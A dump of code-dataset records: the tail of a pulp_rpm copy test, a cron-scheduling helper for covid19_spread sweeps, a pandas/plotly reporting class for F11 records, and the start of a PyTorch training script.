dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n empty_repo = rpm_repository_api.read(empty_repo.pulp_href)\n modules = rpm_modulemd_api.list(repository_version=empty_repo.latest_version_href).results\n module_names = [module.name for module in modules]\n\n # assert that only 2 modules are copied (original and one dependency)\n assert len(modules) == 2\n # assert dependency module names\n for dependency in [\"nodejs\", \"postgresql\"]:\n assert dependency in module_names\n\n\n@pytest.mark.parallel\ndef test_advisory_copy_child_detection(\n init_and_sync,\n monitor_task,\n rpm_advisory_api,\n rpm_copy_api,\n rpm_modulemd_api,\n rpm_package_api,\n rpm_repository_api,\n rpm_repository_factory,\n):\n \"\"\"Test copy advisory and its direct package & module dependencies to an empty repository.\n\n No recursive dependencies.\n\n - Create repository and populate it\n - Create empty repository\n - Use 'copy' to copy an advisory\n - assert advisory and its dependencies were copied\n \"\"\"\n empty_repo = rpm_repository_factory()\n repo, _ = init_and_sync(url=RPM_MODULAR_FIXTURE_URL)\n\n test_advisory_href = get_all_content_hrefs(\n rpm_advisory_api, repository_version=repo.latest_version_href, id=\"FEDORA-2019-0329090518\"\n )[0]\n content_to_copy = [test_advisory_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": empty_repo.pulp_href,\n \"content\": content_to_copy,\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n empty_repo = rpm_repository_api.read(empty_repo.pulp_href)\n\n empty_repo_packages = [\n pkg.name\n for pkg in rpm_package_api.list(repository_version=empty_repo.latest_version_href).results\n ]\n empty_repo_advisories = [\n advisory.id\n for advisory in rpm_advisory_api.list(\n repository_version=empty_repo.latest_version_href\n ).results\n ]\n empty_repo_modules = [\n module.name\n for module in rpm_modulemd_api.list(\n repository_version=empty_repo.latest_version_href\n ).results\n ]\n\n # check the specific advisory was copied\n assert len(empty_repo_advisories) == 1\n # assert that all dependent packages were copied, the direct children of the advisory\n assert len(empty_repo_packages) == 2\n # assert dependency package and module names\n for dependency in [\"postgresql\", \"nodejs\"]:\n assert dependency in empty_repo_packages\n assert dependency in empty_repo_modules\n\n\ndef get_all_content_hrefs(api, **kwargs):\n \"\"\"Fetch all the content using the provided content API and query params.\n\n De-paginates the results.\n \"\"\"\n content_list = []\n\n while True:\n content = api.list(**kwargs, offset=len(content_list))\n page = content.results\n content_list.extend([content.pulp_href for content in page])\n if not content.next:\n break\n\n return content_list\n","repo_name":"pulp/pulp_rpm","sub_path":"pulp_rpm/tests/functional/api/test_copy.py","file_name":"test_copy.py","file_ext":"py","file_size_in_byte":20444,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} +{"seq_id":"70115773868","text":"import sys\nimport os\n\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\nimport cv\nimport tempfile\nfrom subprocess import check_call, check_output\nimport sqlite3\nimport click\nimport datetime\nfrom covid19_spread.lib.context_managers import chdir\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nDB = os.path.join(script_dir, \".sweep.db\")\n\n\ndef 
mk_db():\n if not os.path.exists(DB):\n conn = sqlite3.connect(DB)\n conn.execute(\n \"\"\"\n CREATE TABLE sweeps(\n path text primary key,\n basedate text NOT NULL,\n launch_time real NOT NULL,\n module text NOT NULL,\n slurm_job text,\n id text\n );\n \"\"\"\n )\n conn.execute(\n \"\"\"\n CREATE TABLE submitted(\n sweep_path text UNIQUE,\n submitted_at real NOT NULL,\n FOREIGN KEY(sweep_path) REFERENCES sweeps(path)\n );\n \"\"\"\n )\n\n\nclass Recurring:\n script_dir = script_dir\n\n def __init__(self, force=False):\n self.force = force\n mk_db()\n\n def get_id(self) -> str:\n \"\"\"Return a unique ID to be used in the database\"\"\"\n raise NotImplementedError\n\n def update_data(self) -> None:\n \"\"\"Fetch new data (should be idempotent)\"\"\"\n raise NotImplementedError\n\n def command(self) -> str:\n \"\"\"The command to run in cron\"\"\"\n raise NotImplementedError\n\n def latest_date(self) -> datetime.date:\n \"\"\"\"Return the latest date that we have data for\"\"\"\n raise NotImplementedError\n\n def module(self):\n \"\"\"CV module to run\"\"\"\n return \"mhp\"\n\n def schedule(self) -> str:\n \"\"\"Cron schedule\"\"\"\n return \"*/5 * * * *\" # run every 5 minutes\n\n def install(self) -> None:\n \"\"\"Method to install cron job\"\"\"\n crontab = check_output([\"crontab\", \"-l\"]).decode(\"utf-8\")\n marker = f\"__JOB_{self.get_id()}__\"\n if marker in crontab:\n raise ValueError(\n \"Cron job already installed, cleanup crontab\"\n \" with `crontab -e` before installing again\"\n )\n envs = (\n check_output([\"conda\", \"env\", \"list\"]).decode(\"utf-8\").strip().split(\"\\n\")\n )\n active = [e for e in envs if \"*\" in e]\n conda_env = None\n if len(active) == 1:\n conda_env = f\"source activate {active[0].split()[0]}\"\n\n with tempfile.NamedTemporaryFile() as tfile:\n with open(tfile.name, \"w\") as fout:\n print(crontab, file=fout)\n print(f\"# {marker}\", file=fout)\n user = os.environ[\"USER\"]\n script = os.path.realpath(__file__)\n schedule = self.schedule()\n stdoutfile = os.path.join(self.script_dir, f\".{self.get_id()}.log\")\n stderrfile = os.path.join(self.script_dir, f\".{self.get_id()}.err\")\n home = os.path.expanduser(\"~\")\n cmd = [\n \"source /etc/profile.d/modules.sh\",\n f\"source {home}/.profile\",\n f\"source {home}/.bash_profile\",\n f\"source {home}/.bashrc\",\n conda_env,\n \"slack-on-fail \" + self.command(),\n ]\n cmd = [c for c in cmd if c is not None]\n subject = f\"ERROR in recurring sweep: {self.get_id()}\"\n envs = [\n f'PATH=\"/usr/local/bin:/private/home/{user}/bin:/usr/sbin:$PATH\"',\n \"__PROD__=1\",\n f\"USER={user}\",\n ]\n print(\n f'{schedule} {\" \".join(envs)} bash -c \"{\" && \".join(cmd)} >> {stdoutfile} 2>> {stderrfile}\"',\n file=fout,\n )\n check_call([\"crontab\", tfile.name])\n\n def refresh(self) -> None:\n \"\"\"Check for new data, schedule a job if new data is found\"\"\"\n self.update_data()\n latest_date = self.latest_date()\n conn = sqlite3.connect(DB)\n res = conn.execute(\n \"SELECT path, launch_time FROM sweeps WHERE basedate=? AND id=?\",\n (str(latest_date), self.get_id()),\n )\n if not self.force:\n for pth, launch_time in res:\n launch_time = datetime.datetime.fromtimestamp(launch_time)\n if os.path.exists(pth):\n\n print(f\"Already launched {pth} at {launch_time}, exiting...\")\n return\n # This directory got deleted, remove it from the database...\n conn.execute(\n \"DELETE FROM sweeps WHERE path=? 
AND id=?\", (pth, self.get_id())\n )\n conn.commit()\n\n sweep_path = self.launch_job()\n\n vals = (\n sweep_path,\n str(latest_date),\n datetime.datetime.now().timestamp(),\n self.module(),\n self.get_id(),\n )\n conn.execute(\n \"INSERT INTO sweeps(path, basedate, launch_time, module, id) VALUES (?,?,?,?,?)\",\n vals,\n )\n conn.commit()\n\n def launch_job(self, **kwargs):\n \"\"\"Launch the sweep job\"\"\"\n # Launch the sweep\n config = os.path.join(script_dir, f\"../../cv/{kwargs.get('cv_config')}.yml\")\n with chdir(f\"{script_dir}/../../\"):\n sweep_path, jobs = click.Context(cv.cv).invoke(\n cv.cv,\n config_pth=config,\n module=kwargs.get(\"module\", \"bar\"),\n remote=True,\n array_parallelism=kwargs.get(\"array_parallelism\", 20),\n )\n return sweep_path\n","repo_name":"facebookresearch/covid19_spread","sub_path":"covid19_spread/data/recurring.py","file_name":"recurring.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"32476435441","text":"import pandas as pd\nimport plotly.express as px\nfrom datetime import datetime, timedelta\nfrom data import var_f11, var_global\nfrom general import set_columns_nunique, set_columns_sum, make_tables, set_antiguedad\n\nclass F11():\n \n # Constants\n dt_string = datetime.now().strftime('%y%m%d')\n mes = ['Jan-21','Feb-21','Mar-21','Apr-21','May-21','Jun-21','Jul-21','Aug-21','Sep-21','Oct-21','Nov-21','Dec-21', 'Jan-22', 'Feb-22', 'Mar-22', 'Apr-22', 'May-22','Jun-22','Jul-22'] # Editar esta lista cada vez \n rango_fechas = []\n f11_tcosto = None\n f11_tm90_costo = None\n f11_tcant = None\n f11_tm90_cant = None \n\n def __init__(self, frango, fcorte, f11_name) -> None:\n self.fcorte = fcorte\n self.rango_fechas = frango\n self.f11 = pd.read_csv(var_f11['path_df'] + f11_name + '.csv', dtype='object', sep=';')\n self.path = f\"{var_global['path_cortes']}/{fcorte}_corte/images/f11\"\n self.transform()\n self.f11 = self.f11.sort_values(var_f11['fech_creacion'])\n self.f11 = set_antiguedad(self.f11, 'DIAS', 'f11')\n self.f11_rf = self.f11_filters() # F11 con todos los filtros iniciales\n self.f11_m90 = self.fltr_riesgo(self.f11_rf) # F11 empresa abiertos mayores a 90 días de creados\n self.print_numbers()\n\n def get_max_trend_date(self):\n self.load_trend_files()\n return pd.to_datetime(self.f11_tcosto[var_f11['fecha_corte']], format='%Y-%m-%d').max()\n\n def get_f11(self):\n return self.f11_rf\n\n def get_f11_m90(self):\n return self.f11_m90\n\n def get_path(self):\n return self.path\n\n ## ------ Trasform \n def transform(self):\n print('Transformando valores...')\n # Dates \n self.f11[var_f11['fech_creacion']] = pd.to_datetime(self.f11[var_f11['fech_creacion']], format='%Y-%m-%d')\n self.f11[var_f11['mes']] = self.f11[var_f11['fech_creacion']].dt.strftime('%b-%y')\n # Numbers \n self.f11[var_f11['costo']] = pd.to_numeric(self.f11[var_f11['costo']])\n self.f11[var_f11['dias']]= pd.to_numeric(self.f11[var_f11['dias']])\n # Text\n\n ## ------ Filters\n def f11_filters(self):\n print(\"Generando filtros...\")\n f11_initial = fltr_fecha_desde(self.f11)\n f11_empresa = fltr_empresa(f11_initial)\n f11_st_rf12 = fltr_tipo_f11(f11_empresa)\n f11_emp_abiertos = fltr_abiertos(f11_st_rf12)\n return f11_emp_abiertos\n\n def fltr_riesgo(self, df):\n return df.loc[df['DIAS'] >90]\n\n def load_trend_files(self):\n self.f11_tcosto = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_costo')\n self.f11_tm90_costo = 
pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_m90_costo')\n self.f11_tcant = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_cant')\n self.f11_tm90_cant = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_m90_cant')\n\n def get_f11_cutoff(self):\n print('Generando agrupaciones ... ')\n gb_f11_gm = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['costo']].sum().reset_index()\n gb_f11_gm_m90 = self.f11_m90.groupby([var_f11['grupo'], var_f11['mes']])[var_f11['costo']].sum().reset_index()\n gb_f11_gm_cant = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['f11_id']].nunique().reset_index()\n gb_f11_gm_m90_cant = self.f11_m90.groupby([var_f11['grupo'], var_f11['mes']])[var_f11['f11_id']].nunique().reset_index()\n\n print('Estableciendo nueva fecha de corte ... ')\n gb_f11_gm = set_fecha_corte(gb_f11_gm)\n gb_f11_gm_m90 = set_fecha_corte(gb_f11_gm_m90)\n gb_f11_gm_cant = set_fecha_corte(gb_f11_gm_cant)\n gb_f11_gm_m90_cant = set_fecha_corte(gb_f11_gm_m90_cant)\n\n print('Concatenando corte a histórico ...')\n self.f11_tcosto = pd.concat([self.f11_tcosto, gb_f11_gm], axis=0)\n self.f11_tm90_costo = pd.concat([self.f11_tm90_costo, gb_f11_gm_m90], axis=0)\n self.f11_tcant = pd.concat([self.f11_tcant, gb_f11_gm_cant], axis=0)\n self.f11_tm90_cant = pd.concat([self.f11_tm90_cant, gb_f11_gm_m90_cant], axis=0)\n\n print('Transformando datos ... ')\n # Transform \n self.f11_tcosto = transform_df_trend(self.f11_tcosto, var_f11['costo'])\n self.f11_tm90_costo = transform_df_trend(self.f11_tm90_costo, var_f11['costo'])\n self.f11_tcant = transform_df_trend(self.f11_tcant, var_f11['f11_id'])\n self.f11_tm90_cant = transform_df_trend(self.f11_tm90_cant, var_f11['f11_id'])\n\n print('Guardando análisis del corte!')\n writer = pd.ExcelWriter(var_f11['trend_path'], engine='xlsxwriter')\n self.f11_tcosto.to_excel(writer, sheet_name='f11_abiertos_costo', index=False)\n self.f11_tm90_costo.to_excel(writer, sheet_name='f11_abiertos_m90_costo', index=False)\n self.f11_tcant.to_excel(writer, sheet_name='f11_abiertos_cant', index=False)\n self.f11_tm90_cant.to_excel(writer, sheet_name='f11_abiertos_m90_cant', index=False)\n writer.save()\n print('Hecho!')\n\n def tendencias(self):\n self.load_trend_files()\n self.get_tendencias_costo()\n self.get_tendencias_cantidad()\n\n def print_numbers(self):\n \n print(f'Propietario de f11: {self.f11_rf[var_f11[\"propietario\"]].unique()}')\n print(f'Tipos de F11 encontrados: {self.f11_rf[var_f11[\"servicio\"]].unique()}')\n print(f'Estados de F11 encontrados: {self.f11_rf[var_f11[\"estado\"]].unique()}')\n print(self.f11_rf.groupby([var_f11['grupo']], sort=False)[var_f11['costo']].sum().sort_values(ascending=False))\n\n def f11_resfil(self):\n # Gráfica para costo\n gb_f11_gm = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['costo']].sum().reset_index() # TODO repetido \n gb_f11_gm = set_columns_sum(gb_f11_gm, var_f11['mes'],var_f11['costo'])\n gb_f11_gm = set_columns_sum(gb_f11_gm, var_f11['grupo'],var_f11['costo'])\n orden_grupo = gb_f11_gm.groupby([var_f11['grupo']], sort=False)[var_f11['costo']].sum().sort_values(ascending=False).reset_index()[var_f11['grupo']].to_list()\n orden_mes = gb_f11_gm[var_f11['mes']].unique().tolist()\n total_abierto = gb_f11_gm[var_f11['costo']].sum()\n gb_f11_3m_grupo = self.f11_m90.groupby(var_f11['grupo'])[var_f11['costo']].sum().reset_index().set_index(var_f11['grupo']) # Calcula los totales de costo por grupo \n 
self.fig_f11_costo(gb_f11_gm, gb_f11_3m_grupo, orden_grupo, orden_mes, total_abierto)\n\n # Gráfica por cantidad \n gb_f11_gm_cant = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['f11_id']].nunique().reset_index() # TODO repetido\n gb_f11_gm_cant = set_columns_nunique(gb_f11_gm_cant, var_f11['mes'],var_f11['f11_id'])\n gb_f11_gm_cant = set_columns_nunique(gb_f11_gm_cant, var_f11['grupo'],var_f11['f11_id'])\n orden_grupo_cant = gb_f11_gm_cant.groupby([var_f11['grupo']], sort=False)[var_f11['f11_id']].sum().sort_values(ascending=False).reset_index()[var_f11['grupo']].to_list()\n orden_mes_cant = gb_f11_gm_cant[var_f11['mes']].unique().tolist()\n total_abierto_cant = gb_f11_gm_cant[var_f11['f11_id']].sum()\n gb_f11_3m_cant_grupo = self.f11_m90.groupby(var_f11['grupo'])[var_f11['f11_id']].nunique().reset_index().set_index(var_f11['grupo']) # Calcula los totales de costo por grupo \n self.fig_f11_cantidad(gb_f11_gm_cant, gb_f11_3m_cant_grupo, orden_grupo_cant, orden_mes_cant, total_abierto_cant)\n \n #Generación tablas\n f11_initial = fltr_fecha_desde(self.f11)\n f11_abiertos = fltr_abiertos(f11_initial)\n f11_empresa = fltr_empresa(f11_abiertos)\n f11_cliente = fltr_cliente(f11_abiertos)\n f11_emp_cd = f11_empresa.loc[f11_empresa[var_f11['grupo']] == 'CD']\n f11_emp_no_cd = f11_empresa.loc[~f11_empresa[var_f11['grupo']].isin(['CD', 'BODEGA PRODUCTO EN PROCESO'])]\n f11_cl_cd = f11_cliente.loc[f11_cliente[var_f11['grupo']] == 'CD']\n f11_cl_no_cd = f11_cliente.loc[~f11_cliente[var_f11['grupo']].isin(['CD', 'BODEGA PRODUCTO EN PROCESO'])]\n self.generate_tables(f11_empresa,f11_cliente,f11_emp_cd,f11_emp_no_cd,f11_cl_no_cd,f11_cl_cd)\n\n def fig_f11_costo(self, df, gb_annotations, orden_grupo, orden_mes, ta):\n f11_empresa_sede = px.bar(df, x=var_f11['mes'], y=var_f11['costo'], color=var_f11['grupo'], text=var_f11['costo'], text_auto='.2s', category_orders={var_f11['grupo']:orden_grupo, var_f11['mes']:orden_mes})\n f11_empresa_sede.update_layout(barmode='stack',title_text=f\"F11s empresa abiertos por sede - Total abierto {ta/1e6:,.0f}M\") #,uniformtext=dict(mode=\"hide\", minsize=10),legend=dict(yanchor=\"top\", y=0.95, xanchor=\"left\", x=0.1))\n f11_empresa_sede.update_layout(legend=dict(orientation=\"h\", yanchor=\"top\", y=-0.2, xanchor=\"right\", x=0.5))\n f11_empresa_sede.update_layout(font=dict(size=14))\n\n # f11_empresa_sede.add_shape(type=\"rect\",xref=\"paper\", yref=\"paper\",x0=0, y0=0,x1=0.62, y1=1,line=dict(color=\"red\", width=2,))\n print(f'{orden_mes[0]}-----------------------------')\n mes_ref = orden_mes[0] \n f11_empresa_sede.add_annotation(x=mes_ref, y=0.9*1e9, text= f\"Total > 90 días = {gb_annotations.sum()[0]/1e6:,.0f}M\", showarrow=False, font = dict (color = \"red\",size = 17), xanchor='left') # TODO Estas líneas pueden agrupar, en un solo add_annotation, utilizando <br>, y se alinea mejor utilizando fig.update_annotations(align=\"left\") \n f11_empresa_sede.add_annotation(x=mes_ref, y=0.8*1e9, text= f\"CD = {gb_annotations.loc['CD'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_empresa_sede.add_annotation(x=mes_ref, y=0.7*1e9, text= f\"TIENDAS = {gb_annotations.loc['TIENDAS'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_empresa_sede.add_annotation(x=mes_ref, y=0.6*1e9, text= f\"BODEGA PRODUCTO EN PROCESO = {gb_annotations.loc['BODEGA PRODUCTO EN PROCESO'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), 
xanchor='left')\n # f11_empresa_sede.add_annotation(x=mes_ref, y=0.5*1e9, text= f\"DVD ADMINISTRATIVO = {gb_annotations.loc['DVD ADMINISTRATIVO'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n\n f11_empresa_sede.layout.yaxis.title.text='Total costo promedio'\n f11_empresa_sede.layout.xaxis.title.text='Mes de creación'\n f11_empresa_sede.write_image(f\"{self.path}/{self.fcorte}_f11_empresa_abiertos_sede_monto.png\",scale=1, height=800,width=850, engine='orca')\n \n def fig_f11_cantidad(self, df, gb_annotations, orden_grupo, orden_mes, ta):\n f11_es_cantidad = px.bar(df, x=var_f11['mes'], y=var_f11['f11_id'], color=var_f11['grupo'], text=var_f11['f11_id'], text_auto='.0f', category_orders={var_f11['grupo']:orden_grupo, var_f11['mes']:orden_mes})\n f11_es_cantidad.update_layout(barmode='stack',title_text=f\"F11s empresa abiertos por sede - Total abierto {ta:,.0f} folios de F11\" ) #,uniformtext=dict(mode=\"hide\", minsize=10),legend=dict(yanchor=\"top\", y=0.95, xanchor=\"left\", x=0.1))\n f11_es_cantidad.update_layout(legend=dict(orientation=\"h\", yanchor=\"top\", y=-0.2, xanchor=\"right\", x=0.5))\n f11_es_cantidad.update_layout(font=dict(size=14))\n\n # f11_es_cantidad.add_shape(type=\"rect\",xref=\"paper\", yref=\"paper\",x0=0, y0=0,x1=0.62, y1=1,line=dict(color=\"red\", width=2,))\n mes_ref = orden_mes[0]\n f11_es_cantidad.add_annotation(x=mes_ref, y=1200, text= f\"Total > 90 días = {gb_annotations.sum()[0]:,.0f} folios\", showarrow=False, font = dict (color = \"red\",size = 17), xanchor='left') # TODO igual que en la lina 88\n f11_es_cantidad.add_annotation(x=mes_ref, y=1000,text= f\"CD = {gb_annotations.loc['CD'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_es_cantidad.add_annotation(x=mes_ref, y=900,text= f\"TIENDAS = {gb_annotations.loc['TIENDAS'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_es_cantidad.add_annotation(x=mes_ref, y=800,text= f\"BODEGA PRODUCTO EN PROCESO = {gb_annotations.loc['BODEGA PRODUCTO EN PROCESO'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n # f11_es_cantidad.add_annotation(x=mes_ref, y=700,text= f\"DVD ADMINISTRATIVO = {gb_annotations.loc['DVD ADMINISTRATIVO'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n\n f11_es_cantidad.layout.yaxis.title.text='Cantidad de folios de F11'\n f11_es_cantidad.layout.xaxis.title.text='Mes de creación'\n f11_es_cantidad.write_image(F\"{self.path}/{self.fcorte}_f11_empresa_abiertos_sede_cantidad.png\",scale=1, height=800,width=850, engine='orca')\n\n def generate_tables(self,f11_empresa,f11_cliente,f11_emp_cd,f11_emp_no_cd,f11_cl_no_cd,f11_cl_cd):\n tb_emp_gen = make_tables(f11_empresa,'SERVICIO','GRUPO',var_f11['costo'])\n tb_cl_gen = make_tables(f11_cliente,'SERVICIO','GRUPO',var_f11['costo'])\n tb_emp_gen_ant = make_tables(f11_empresa,'SERVICIO','age',var_f11['costo'], 'f11','f11_ant')\n tb_cl_gen_ant = make_tables(f11_cliente,'SERVICIO','age',var_f11['costo'],'f11_cl', 'f11_ant')\n tb_emp_cd = make_tables(f11_emp_cd,'SERVICIO','age',var_f11['costo'],'f11','f11_ant')\n tb_emp_no_cd = make_tables(f11_emp_no_cd.sort_values('DIAS',ascending=True),'SERVICIO','age',var_f11['costo'],'f11','f11_ant')\n tb_cl_no_cd = make_tables(f11_cl_no_cd.sort_values('DIAS',ascending=True),'SERVICIO','age',var_f11['costo'],'f11_cl','f11_ant')\n tb_cl_cd = 
make_tables(f11_cl_cd.sort_values('DIAS',ascending=True),'SERVICIO','age',var_f11['costo'],'f11_cl','f11_ant')\n\n tb_emp_gen.write_image(f'{self.path}/{self.fcorte}tb_emp_gral.png',height = 500, width = 1500, engine='orca')\n tb_cl_gen.write_image(f'{self.path}/{self.fcorte}tb_cl_gral.png',height = 500, width = 1500, engine='orca')\n tb_emp_cd.write_image(f'{self.path}/{self.fcorte}tb_emp_cd.png',height = 500, width = 1500, engine='orca')\n tb_emp_no_cd.write_image(f'{self.path}/{self.fcorte}tb_emp_no_cd.png',height = 500, width = 1500, engine='orca')\n tb_cl_no_cd.write_image(f'{self.path}/{self.fcorte}tb_cl_no_cd.png',height = 500, width = 1500, engine='orca')\n tb_cl_cd.write_image(f'{self.path}/{self.fcorte}tb_cl_cd.png',height = 500, width = 1500, engine='orca')\n tb_emp_gen_ant.write_image(f'{self.path}/{self.fcorte}tb_emp_ant.png',height = 500, width = 1500, engine='orca')\n tb_cl_gen_ant.write_image(f'{self.path}/{self.fcorte}tb_cl_ant.png',height = 500, width = 1500, engine='orca')\n\n # ---------------- Trend methods \n def get_tendencias_costo(self):\n # Total flujo \n tcd = self.f11_tcosto.loc[self.f11_tcosto[var_f11['grupo']]=='CD']\n ttienda = self.f11_tcosto.loc[(self.f11_tcosto[var_f11['grupo']]=='TIENDAS')|(self.f11_tcosto[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tcd = tcd.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n gb_ttienda = ttienda.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n\n self.fig_f11_trend_costo(gb_tcd, 'CD', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_costo(gb_ttienda, 'Tiendas & DVD', ['rgb(36, 121, 108)'])\n\n # Mayores a 90 días \n tm90_cd = self.f11_tm90_costo.loc[self.f11_tm90_costo[var_f11['grupo']]=='CD']\n tm90_tienda = self.f11_tm90_costo.loc[(self.f11_tm90_costo[var_f11['grupo']]=='TIENDAS')|(self.f11_tm90_costo[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tm90_cd = tm90_cd.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n gb_tm90_tienda = tm90_tienda.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n\n self.fig_f11_trend_costo(gb_tm90_cd, 'CD mayores a 90 días', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_costo(gb_tm90_tienda, 'Tiendas & DVD mayores a 90 días', ['rgb(36, 121, 108)'])\n\n def fig_f11_trend_costo(self, df, local, color):\n df[var_f11['costo']] = round(df[var_f11['costo']]/1e6)\n fig_f11_cd_trend = px.line(df, x=var_f11['fecha_corte'], y=var_f11['costo'], labels={var_f11['fecha_corte']:'Fecha de corte', \n var_f11['costo']: \"Costo total (Millones)\" }, text=var_f11['costo'], color_discrete_sequence=color, \n title=f\"F11 abiertos {local}\" )\n fig_f11_cd_trend.update_layout(legend=dict(yanchor=\"top\", y=1, xanchor=\"left\", x=0.45))\n fig_f11_cd_trend.update_traces(textposition=\"bottom right\")\n fig_f11_cd_trend.update_xaxes(range=self.rango_fechas, constrain=\"domain\")\n fig_f11_cd_trend.update_layout(font=dict(size=14))\n # nuevos \n fig_f11_cd_trend.update_layout(margin_r=20, margin_t=60)\n fig_f11_cd_trend.write_image(f\"{self.path}/{self.fcorte}_f11_trend_{local}.png\",width=550, height=400, engine='orca')\n\n def get_tendencias_cantidad(self):\n # Cantidad \n self.f11_tcant = transform_df_trend(self.f11_tcant, var_f11['f11_id'])\n \n tcd = self.f11_tcant.loc[self.f11_tcant[var_f11['grupo']]=='CD']\n ttienda = self.f11_tcant.loc[(self.f11_tcant[var_f11['grupo']]=='TIENDAS')|(self.f11_tcant[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tcd = 
tcd.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n gb_ttienda = ttienda.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n\n self.fig_f11_trend_cantidad(gb_tcd, 'CD', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_cantidad(gb_ttienda, 'Tiendas & DVD', ['rgb(36, 121, 108)'])\n\n # Cantidad 90 días \n self.f11_tm90_cant = transform_df_trend(self.f11_tm90_cant, var_f11['f11_id'])\n\n tm90_cd = self.f11_tm90_cant.loc[self.f11_tm90_cant[var_f11['grupo']]=='CD']\n tm90_tienda = self.f11_tm90_cant.loc[(self.f11_tm90_cant[var_f11['grupo']]=='TIENDAS')|(self.f11_tm90_cant[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tm90_cd = tm90_cd.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n gb_tm90_tienda = tm90_tienda.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n\n self.fig_f11_trend_cantidad(gb_tm90_cd, 'CD mayores a 90 días', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_cantidad(gb_tm90_tienda, 'Tiendas & DVD mayores a 90 días', ['rgb(36, 121, 108)'])\n\n def fig_f11_trend_cantidad(self, df, local, color):\n fig_f11_cd_trend = px.line(df, x=var_f11['fecha_corte'], y=var_f11['f11_id'], labels={var_f11['fecha_corte']:'Fecha de corte', \n var_f11['f11_id']: \"Cantidad de folios F11\" }, text=var_f11['f11_id'], color_discrete_sequence=color, \n title=f\"F11 abiertos {local}\" )\n fig_f11_cd_trend.update_layout(legend=dict(yanchor=\"top\", y=1, xanchor=\"left\", x=0.45))\n fig_f11_cd_trend.update_traces(textposition=\"bottom right\")\n fig_f11_cd_trend.update_xaxes(range=self.rango_fechas, constrain=\"domain\")\n fig_f11_cd_trend.update_layout(margin_r=20, margin_t=60)\n fig_f11_cd_trend.update_layout(font=dict(size=14))\n fig_f11_cd_trend.write_image(f\"{self.path}/{self.fcorte}_f11_tcant_{local}.png\",width=550, height=400, engine='orca')\n\n# General methods \n\ndef fltr_tipo_f11(df):\n return df.loc[df[var_f11['servicio']].isin(var_f11['tipo_f11_x_grafica'])]\n\ndef fltr_empresa(df):\n return df.loc[df[var_f11['propietario']] == var_f11['prop_empresa']].reset_index(drop=True)\n\ndef fltr_cliente(df):\n return df.loc[df[var_f11['propietario']] == var_f11['prop_cliente']].reset_index(drop=True)\n\ndef fltr_abiertos(df):\n return df.loc[df[var_f11['estado']].isin(var_f11['estados_abiertos'])].reset_index(drop=True)\n \ndef fltr_fecha_desde(df):\n return df.loc[df[var_f11['fech_creacion']] >= var_f11['fecha_inicial']].reset_index(drop=True)\n\ndef transform_df_trend(df, value):\n df[value] = pd.to_numeric(df[value])\n df[var_f11['fecha_corte']] = pd.to_datetime(df[var_f11['fecha_corte']], format='%Y-%m-%d')\n return df \n\ndef set_fecha_corte(df, fecha_corte=datetime.now().strftime(\"%Y-%m-%d\")):\n df['FECHA_CORTE']= fecha_corte\n return df\n","repo_name":"maperezrf/Slides_f","sub_path":"f11.py","file_name":"f11.py","file_ext":"py","file_size_in_byte":20402,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33665412844","text":"#coding=UTF-8\nimport os\nimport random\nfrom torchvision import models\nimport numpy as np\nimport time\nimport copy\nimport torch\nimport input_data\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\n\n# ---------------------------------------------------------------------------\n# hyperparameters\ntrain_dir = './flower_photos'\nratio = 0.3\nSIZE = 224\nEPOCHS = 30\nseed = 1\n# ---------------------------------------------------------------------------\n\n# 
